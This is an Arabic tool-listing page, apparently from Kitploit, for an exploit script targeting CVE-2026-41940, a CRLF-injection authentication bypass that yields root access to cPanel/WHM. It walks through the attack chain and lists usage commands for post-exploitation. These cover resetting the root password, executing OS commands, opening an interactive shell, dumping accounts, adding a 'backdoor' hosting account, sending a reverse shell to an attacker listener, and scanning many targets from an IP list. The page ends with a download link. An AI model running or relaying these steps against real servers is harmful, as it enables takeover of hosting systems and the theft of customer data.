Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/kill1234545/cve-2026-41940
المصادقة والترخيصتصعيد الامتيازاتآليات الاستمراريةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالاختبار الاختراق
GitHubkill1234545/cve-2026-41940

CVE-2026-41940

تجاوز المصادقة في cPanel/WHM (ثغرة يوم الصفر)

عرض المستودع
102منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-41940: تجاوز المصادقة في cPanel/WHM (هدف واحد وعدة أهداف)

إخلاء مسؤولية: هذه الوثيقة والبرنامج النصي المرتبط بها (exploit.py) مقدَّمان حصريًا للأغراض التعليمية وأبحاث الأمن واختبار الاختراق المصرَّح به. لا تستخدم هذا البرنامج ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها.

نظرة عامة

exploit.py هو برنامج نصي يوضح ثغرة تجاوز المصادقة (CVE-2026-41940) في cPanel وWHM. تتيح هذه الثغرة لمهاجم غير مصادَق حقن جلسة صلاحيات الجذر (root) في ذاكرة التخزين المؤقت للخدمة (daemon cache) عبر خلل في حقن CRLF، مما يمنح في النهاية وصولاً على مستوى الجذر إلى WHM دون الحاجة إلى بيانات اعتماد صالحة.

تحليل الثغرة وسير عمل الاستغلال

يعمل الاستغلال عبر توظيف ثغرة حقن CRLF (إرجاع العربة وتغذية السطر) داخل آلية معالجة المصادقة الأساسية (Basic Authentication)، إلى جانب خلل في نشر الجلسات. يقوم البرنامج النصي بأتمتة الهجوم على أربع مراحل:

  1. توليد جلسة ما قبل المصادقة: يتصل بنقاط نهاية تسجيل دخول عامة (مثل /login/ أو /cgi/login.cgi) للحصول على ملف تعريف ارتباط جلسة أساسي غير مصادَق (whostmgrsession).
  2. حقن CRLF: يرسل ترويسة Basic Authentication مصمّمة بعناية تحتوي حمولة مشفّرة بـ Base64 تحقن حقول جلسة الجذر مباشرةً في ذاكرة التخزين المؤقت لجلسات cpsrvd. ويؤدي رد إعادة التوجيه من الخادم إلى تسريب رمز الأمان المُولَّد (cpsess).
  3. نشر الجلسة: يتم إرسال ملف تعريف ارتباط الجلسة الخام إلى نقطة نهاية WHM مصادَق عليها، مما يُفعّل do_token_denied لنشر الجلسة المزوّرة في ذاكرة التخزين المؤقت للخدمة — ليصبح ذلك جلسة مصادَق عليها صالحة.
  4. التحقق: يصل إلى نقاط نهاية WHM API المقيدة (مثل /json-api/version) باستخدام الجلسة المزوّرة لتأكيد الوصول على مستوى الجذر.

المتطلبات الأساسية

  • Python 3.x
  • مكتبة requests
root@kitploit:~
pip install requests

الاستخدام

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

الوسائط

اختيار الهدف

الوسيطالوصف
--target URLعنوان WHM واحد (مثل https://target:2087)
--target-file FILEملف يحتوي على الأهداف (سطر واحد بصيغة ip:port لكل هدف) — يفعّل وضع الفحص تلقائيًا

خيارات الشبكة والأساسيات

الوسيطالوصف
--threads Nسلاسل تنفيذ متزامنة لوضع الأهداف المتعددة (الافتراضي: 10)
--hostname HOSTتجاوز ترويسة Host — استخدمه عند فشل الاكتشاف التلقائي أو إعطائه اسم مضيف خاطئ
--timeout Nمهلة زمنية لكل طلب بالثواني (الافتراضي: 15)
--retries Nعدد مرات إعادة المحاولة عند أخطاء الشبكة (الافتراضي: 3)
--cookie-name NAMEفرض اسم محدد لملف تعريف ارتباط الجلسة (يُكتشف تلقائيًا عند حذفه)
--no-verifyتخطِّ التحقق من المرحلة 4 والمتابعة على أي حال

خيارات الاستغلال (ما بعد التجاوز)

الوسيطالوصف
--checkوضع الفحص فقط — التحقق من الثغرة دون استغلالها (يُضبط تلقائيًا مع --target-file)
--password PASSتغيير كلمة مرور الجذر إلى PASS
--api FUNCاستدعاء دالة محددة من WHM JSON-API
--api-params K=V,...معاملات مفصولة بفواصل لخيار --api
--exec CMDتنفيذ أمر نظام تشغيل عبر WHM scripts/run_script (البديل: rawexec)
--sessionتوليد رابط تسجيل دخول بضغطة واحدة بصلاحيات الجذر — افتحه فورًا، الرمز تنتهي صلاحيته بسرعة
--shellالدخول إلى قشرة WHM تفاعلية (لهدف واحد فقط)
--dumpتفريغ معلومات الخادم: الإصدار، الحسابات، مناطق DNS، الصلاحيات
--add-user USER PASS DOMAINإنشاء حساب استضافة cPanel جديد
--revshell LHOST LPORTإرسال قشرة عكسية (reverse shell) بلغة bash إلى المستمع الخاص بك

خيارات الإخراج

الوسيطالوصف
--output FILEحفظ رمز الجلسة والتفاصيل في ملف JSON

أمثلة

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

أوامر القشرة التفاعلية

عند استخدام --shell، تتوفر الأوامر التالية:

الأمرالوصف
api <function> [k=v ...]استدعاء دالة WHM JSON-API (مثل api version)
exec <command>تنفيذ أمر نظام تشغيل عبر WHM (مثل exec id)
passwd <newpass>تغيير كلمة مرور الجذر
dumpتفريغ معلومات الخادم
revshell <lhost> <lport>إرسال قشرة عكسية
add <user> <pass> <domain>إنشاء حساب cPanel
save <path>حفظ الجلسة الحالية في ملف
exit / quitالخروج من القشرة

تذكير

طبّق أحدث التصحيحات الأمنية لـ cPanel/WHM فورًا.

تنزيل الأداة